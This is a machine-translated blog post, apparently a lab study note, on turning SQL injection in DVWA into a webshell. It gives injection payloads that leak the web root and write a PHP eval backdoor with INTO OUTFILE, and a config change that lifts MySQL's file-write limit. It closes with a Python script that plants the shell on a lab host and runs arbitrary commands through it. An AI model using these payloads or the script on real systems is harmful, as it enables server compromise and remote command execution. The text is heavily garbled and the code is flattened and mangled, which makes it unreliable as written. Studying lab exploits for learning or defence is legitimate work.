DVWA from injection to Getshell

Live your life well, and don't be too busy telling people what you're doing.

Recently in the review of what has been learned, I have re-built a dvwa to learn new ideas, write some simple scripts to practice the ability to write code.

It is well known that the harm of SQL injection is quite large, for each old driver, if found injection point and can be used, in addition to the pants of course is to guess the administrator's username and password, backstage upload Webshell, although these processes are not necessarily smooth, but the general process, There are all kinds of problems in the middle of the way, and after that, I learned to share them when I was better.

Today we are talking about using SQL injection vulnerability to write Webshell. When we find an injection bug, but can't find the background, what to do, if the database administrator permissions are relatively large, we can use SQL injection to the Web site to write to the shell.

Prerequisites for writing Webshell:

1.select into OutFile method available (allows export of files)

2. We need to know the absolute path where the site is located

3. We have sufficient authority to

First we identified the injection point, and then the absolute path of the site is exploded:

Enter in the input box, 1 ' union select ' x ', ' x ' into outfile ' xx '--Use the wrong SQL statement to make the database error and return the absolute path

Now that you have the absolute path to the site, the next step is to use SQL injection to write the shell, insert the 1 ' union select ' <?php @eval ($_get[' cmd ') in the input box?> "," Hello admin "into OutFile 'C:\ \phpstudy\phptutorial\WWW\dvwa\hello.php' (Note that it is two "\") Click Submit, we will see if the upload is successful

When we enter select ' xx ' into outfile ' xxxx/xx/xx '--you may encounter a situation:

Workaround: Locate the My.ini file in the last line and add a secure_file_prv= "/" to restart MySQL.

============================================================ attached herself to write the automated spicy Chicken Code ====================================== ===================================

#-*-Utf-8-*-import requestsimport reheaders = {' Accept ': ' text/html,application/xhtml+xml,application/xml;q=0.9, image/webp,image/apng,*/*;q=0.8 ', ' accept-encoding ': ' gzip, deflate ', ' accept-language ': ' zh-cn,zh;q=0.8 ', ' Cache-control ': ' max-age=0 ', ' Connection ': ' keep-alive ', ' Cookie ': ' Security=low; Phpsessid=pie6uqttjqtnadq1b5dp8640u1 ', ' Host ': ' 192.168.86.129 ', ' Referer ': ' http://192.168.86.129/dvwa/ Security.php ', ' upgrade-insecure-requests ': ' 1 ', ' user-agent ': ' mozilla/5.0 (Windows NT 10.0; Win64; x64) applewebkit/537.36 (khtml, like Gecko) chrome/59.0.3071.115 safari/537.36 '}url = raw_input (' URL: ') print ' = ' *15,u ' Big Uncle Wait ', ' = ' *15payload = '%27+union+select+ ' <%3Fphp+%40eval%28%24_GET%5B%27cmd%27%5D%29%3F> '%2c ' hello+admin ' + Into+outfile+%27c%3a%5c%5cphpstudy%5c%5cphptutorial%5c%5cwww%5c%5cdvwa%5c%5chello.php%27+--+&submit=submit # ' URL1 = Requests.get (url+payload,headers=headers) url2 = ' http://192.168.86.129/dvwa/hello.php ' url3 = Requests.get ( url2,headers=headers) Url4 = Re.findall (' <body> (.*?) </body> ', url3.text) if ' Hello ' in url3.text:print u ' Webshell has been written, the path is: http://192.168.86.129/dvwa/hello.php ' else :p rint u ' write failed ' Print U ' sir, go ahead! ' URL5 = ' http://192.168.86.129/dvwa/hello.php?cmd= ' url6 = raw_input () Url7 = Requests.get (url5+url6,headers=headers) Url8 = Re.findall (' <body> (. *?) </body> ', url7.content) print url7.content

　　

To record their learned knowledge, in case forget, every day progress a little, mutual encouragement.

DVWA from injection to Getshell